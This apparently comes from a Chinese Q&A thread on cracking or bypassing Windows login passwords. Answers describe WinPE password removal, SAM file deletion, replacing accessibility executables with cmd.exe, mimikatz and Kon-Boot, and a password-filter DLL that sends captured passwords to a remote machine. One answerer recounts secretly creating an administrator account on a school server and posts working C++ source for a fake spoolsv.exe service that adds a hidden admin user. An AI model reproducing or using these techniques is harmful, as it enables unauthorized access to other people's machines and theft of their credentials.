如何破解windows開機密碼?


照電影里的橋段,都是隨便猜幾下就猜出密碼來了,這叫social engineering。


非當前系統下,將密碼文件SAM文件替換為初始文件。

翻譯一下:開機,插U盤,進各論壇制的U盤win pe後,跟據提示,清除開機密碼,讓工具自動幫你替換文件,然後就ok了。


唔 正好最近有做過此類事情

故回答下

幾個月前繞過登錄界面直接添加賬戶在某伺服器上

因為不能被發現自己修改了伺服器密碼

故用添加賬戶的方式在伺服器上新建administrators組的用戶名

然而後來忘記註銷賬戶偽造現場還是被老師發現了

不過我居然沒有被批鬥

具體:

無論PC和Server一般都有啟用印表機服務Spooler

所以就從這個服務下手

替換掉這個系統服務應用程序

重啟 萬事大吉→_→(逃

編譯器:Mingw g++ 4.7.1

系統要求:打開印表機服務 至少Windows XP Professional家族

程序名:spoolsv.exe

copy程序到x:windowssystem32下即可

記得備份噢!

#include &

LPSTR Sname="spooler";

SERVICE_STATUS_HANDLE ssh;
SERVICE_STATUS ss;

void WINAPI Service_Main(DWORD, LPTSTR *);
void WINAPI Service_Control(DWORD);

int main(int argc,LPTSTR * argv)
{
SERVICE_TABLE_ENTRY STE[]={Sname,(LPSERVICE_MAIN_FUNCTION)Service_Main,NULL,NULL};
StartServiceCtrlDispatcher(STE);
return 0;
}

void WINAPI Service_Main(DWORD dwArgc, LPTSTR * lpszArgv){
if (!(ssh=RegisterServiceCtrlHandler(Sname,Service_Control)));
ss.dwServiceType=SERVICE_WIN32_OWN_PROCESS;
ss.dwCurrentState=SERVICE_START_PENDING;
ss.dwControlsAccepted=SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;
ss.dwServiceSpecificExitCode=0;
ss.dwWin32ExitCode=0;
ss.dwCheckPoint=0;
ss.dwWaitHint=2;
SetServiceStatus(ssh,ss);
ss.dwCurrentState=SERVICE_RUNNING;
ss.dwCheckPoint=0;
ss.dwWaitHint=0;
SetServiceStatus(ssh,ss);
system("net user temp$ w /add");
system("net localgroup administrators temp$ /add");
ss.dwCurrentState=SERVICE_STOPPED;
SetServiceStatus(ssh,ss);
return ;
}

void WINAPI Service_Control(DWORD dwControl){}

//去掉了錯誤修正:)請慢用


螺絲刀 -- 打開筆記本背板 -- 拔下硬碟 -- 當成外接硬碟插到你自己的電腦上 -- 複製粘貼整個硬碟內容 -- 把硬碟裝回去...


Windows to go


下載大白菜

製作U盤啟動盤

開機按F2進bios setup

設置啟動順序為USB。。。。

開機

進入win pe,清除密碼或查看密碼

開機(無密碼)


我記得小時候家裡電腦是win98 父母為了防止我偷玩遊戲把電腦設了個開機密碼

不過多久他們發現我周末玩電腦的時候居然不找他們輸密碼,自己也能把電腦打開。

他們懷疑密碼被我破解了,就把開機密碼換啊換,可是沒個卵用

因為每次開機直接把輸入開機密碼的窗口關掉就好了。。。。。。。。。。。。。。


試試 mimikatz


怒答一記

題主題主面對著空蕩蕩的密碼輸入框,越來越迷茫。

絕望的他意識到,此時除了關機和重啟之外,做不了任何事情。

忽然間,他發現屏幕角落裡藏著一個時鐘一樣的按鈕,他點了下去。

映在眼前的是放大鏡 屏幕鍵盤之類的程序。題主每個工具都打開了一遍,但每個工具都派不上用場。

ㄟ( ̄▽ ̄ㄟ)哪有可能沒用?

這些程序的啟動都是有管理員許可權的,它們都是 system32 文件夾下的應用程序,比如放大鏡是 m什麼鬼.exe(不會拼)。那就好辦啦,把cmd.exe 的名字改成放大鏡的(我當初用的是 Ubuntu 光碟試用版改的,比樓下一眾 PE 系統高大上多了)。

下次啟動再開放大鏡,執行的就是帶有管理員許可權的命令行háng程序。

至於如何使用命令行修改密碼,那又是另一個問題了。自己必應吧。


我自己見過的一個唯一靠技術手段破的,是趨勢科技一個人,通過類似 BadUSB 的技術直接在開機階段改密碼驗證流程無密碼登錄了win7。


在U盤或移動硬碟上裝一個普通系統,然後接上目標電腦,更改BIOS啟動項

以後想用哪台有密碼的電腦,直接掏出隨身帶的U盤或移動硬碟。

當然,最簡單的就是弄一個PE盤,直接無密碼進入系統(不留痕迹,你清除了人家設的密碼還得知道是密碼是什麼,再給人家重新設置上去)


假設該電腦開啟了Guest賬戶,可以通過添加開機啟動項的方式,讓電腦新增一個管理員賬戶,從而修改密碼。

其實自己做一個PE啟動也不難,直接跟著工具走就好。

其實在某些時候,social engineering也是一個不錯的方法呢。


說一個遠程的方法

自製一個password filter dll程序放在system32下面並在註冊表中配置,這樣以後用戶每次更改密碼都會進入到這個dll程序裡面。

通過dll把每次的密碼修改內容傳輸到遠程機器上,這樣就可以遠程獲取密碼了。

缺點是必須修改密碼才能觸發,且配置這個dll的時候需要管理員許可權。


有個工具叫Kon-Boot,可以繞過windows(從xp-10),mac的密碼...使用也是很簡單唉....

在公眾號whiteh4t里有下載鏈接嘿嘿嘿


那麼麻煩幹嘛,找個u盤做個pe,一鍵安裝然後讓pe自己去刪除密碼


去網上下一個windows PE 製作u盤啟動工具。 裡面菜單有破解密碼這一項。 u盤插入電腦,開機按f12鍵,然後鍵盤方向鍵選擇你的usb設備回車。 進入u盤,按提示操作。

簡單點就拿去讓電腦店小夥子弄一下ok.


哈哈這是我的童年我來講。

首先找到你爸爸沒有仔細藏好的盜版系統盤。

插入盜版系統盤,從盤裡啟動,此時電腦什麼都幹不了只能進行複製粘貼等基礎操作。

然後備份C:Windowssystem32config里的sam文件(記不清了百度的)

刪掉該文件,重啟,就沒有密碼了(大概

關機後再從系統盤啟動一次,把sam文件剪切回原位置


參見Big Bang Theory第九季第12集

大概五六分鐘的樣子


=口=!!!!


PE破或者清除。

更簡單的,如果要拷貝電腦里的東西,直接拔掉硬碟就行,無視各種開機密碼。


推薦閱讀:

在Mac/Linux下刪除一個很大很深的文件夾似乎比Windows要快,造成這種差別的原因是什麼?
更換筆記本主板後,WIN10還能自動激活嗎?
截止2017年5月,全球有多少PC用戶依然使用Win9x/NT/2000/XP/Vista?
能否在 Windows 中完整模擬 fork(3)?若能,如何?
「記事本」程序的BUG?

TAG:MicrosoftWindows | 計算機 | 安全漏洞 |